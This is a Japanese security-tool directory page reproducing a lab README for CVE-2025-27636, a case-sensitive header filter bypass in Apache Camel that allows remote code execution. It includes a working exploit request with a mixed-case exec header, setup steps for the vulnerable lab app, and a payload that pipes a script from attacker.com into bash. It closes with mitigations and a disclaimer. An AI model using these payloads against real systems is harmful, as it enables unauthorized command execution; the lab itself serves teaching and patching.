Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-27636-Practical-Lab — CVE-2025-27636の再現ハンズオンラボ。Apache Camelにおける大文字小文字を区別するヘッダーフィルターのバイパスを利用した重大なRCEです。execエンドポイントを介して任意のコマンドを実行するヘッダーインジェクションを実演します。 | Kitploit
ツール/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

CVE-2025-27636の再現ハンズオンラボ。Apache Camelにおける大文字小文字を区別するヘッダーフィルターのバイパスを利用した重大なRCEです。execエンドポイントを介して任意のコマンドを実行するヘッダーインジェクションを実演します。

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2025-27636 — Apache Camel 実践的な悪用ラボ

🔍 概要

CVE-2025-27636 は、Apache Camel、特に camel-exec コンポーネントにおける深刻な Remote Code Execution (RCE) 脆弱性です。これは、微妙だが危険な問題に起因します:

DefaultHeaderFilterStrategy はヘッダー名の大文字小文字を区別してチェックするため、別の大文字小文字を使用してバイパスされる可能性があります。

つまり、ブロックされるべき内部Camelヘッダー(例:CamelExecCommandExecutable)が、大文字小文字を操作される(例:cAmeLexecCommandExecutable)ことで通過してしまう可能性があります。

このヘッダーが exec: エンドポイントに到達すると、攻撃者は任意のコマンドを注入でき、システム全体が侵害されます。


📌 技術的背景

✅

DefaultHeaderFilterStrategy

Apache Camel の DefaultHeaderFilterStrategy は、以下のような内部ヘッダーを保護するためのものです。

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 大文字小文字のバイパスがあった場合に脆弱

🔍 「内部」とはどういう意味ですか?

内部ヘッダーとは、

  • Camel* で始まる
  • Camel 内でのみ動作(ルーティング、処理、エンドポイント)を制御するために使用される
  • HTTP、JMS などの外部システムに公開されることを意図していない

しかし、パッチ適用前は、このフィルターはヘッダー名を大文字小文字を区別して一致させていたため、HTTP仕様(ヘッダーは大文字小文字を区別しない)に違反し、次のようなバイパスが可能でした:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

このヘッダーは exec: コンポーネントに渡され、ペイロードが実行されます。

🛠️ CamelExecCommandExecutable

このヘッダーは camel-exec コンポーネントにどのコマンドを実行するかを指示します。これは強力であり、ユーザーによって制御可能な場合、特に OS レベルのコマンド(例:bash、cmd.exe など)をサポートする環境では非常に危険です。


🧪 ハンズオンラボ: Pinewood Server Diagnostic

プロジェクト: Pinewood Server Diagnostic 作成者: @enochgitgamefied 目的: ライブの教育用ラボで CVE-2025-27636 を再現する。


🔗 GitHub リポジトリ

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 プロジェクト概要

  • Apache Camel 4.10.0 で構築
  • ルート:
    • /tasks → exec:tasklist または exec:ps を使用してタスクを一覧表示
    • /systeminfo → OS情報を出力 (systeminfo または uname -a)
    • /network → ipconfig または ifconfig を表示
  • 組み込みJettyを使用して / でWeb UIを提供
  • フィルタリングがパッチ適用されていない場合、大文字小文字を変更したヘッダーインジェクションに対して脆弱

⚙️ はじめに

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

その後、ブラウザでアクセス:

🖥️ http://<your-ip>:8484


🚨 脆弱性の実証

パッチ未適用の動作:

次のようなヘッダーを送信すると(大文字小文字に注意):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

フィルターはブロックせず、exec: エンドポイントに渡されます。次のように実証できます:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← 危険

🎥 YouTube デモ

完全なデモは準備中で、近日中にアップロードされます。以下の手順を説明します:

  • アプリケーションのセットアップ
  • ヘッダーインジェクション
  • コマンド実行
  • 修正手順

YouTube デモリンク: https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ 緩和策と修正

  1. Apache Camel をアップグレードし、大文字小文字を区別しないヘッダーフィルタリングが実装されたバージョンにする(これがパッチです)。
  2. より厳密なロジックを適用する必要がある場合は、カスタム HeaderFilterStrategy を使用する。
  3. 完全にロックダウンされていない限り、exec: ルートを HTTP に直接公開しない。

🧠 重要なポイント

  • 内部ヘッダーは外部ユーザーによって制御可能であってはなりません。
  • セキュリティフィルターにおける大文字小文字の区別は、よく知られたアンチパターンです。
  • Apache Camel は強力ですが、その力には責任が伴います。特に HTTP を exec にチェーンする場合はそうです。

⚠️ 免責事項

このラボは教育目的および管理されたラボでのみ使用することを目的としています。 許可されていないシステムやネットワークでこれを行わないでください。

Apache Camel2
ツールをダウンロード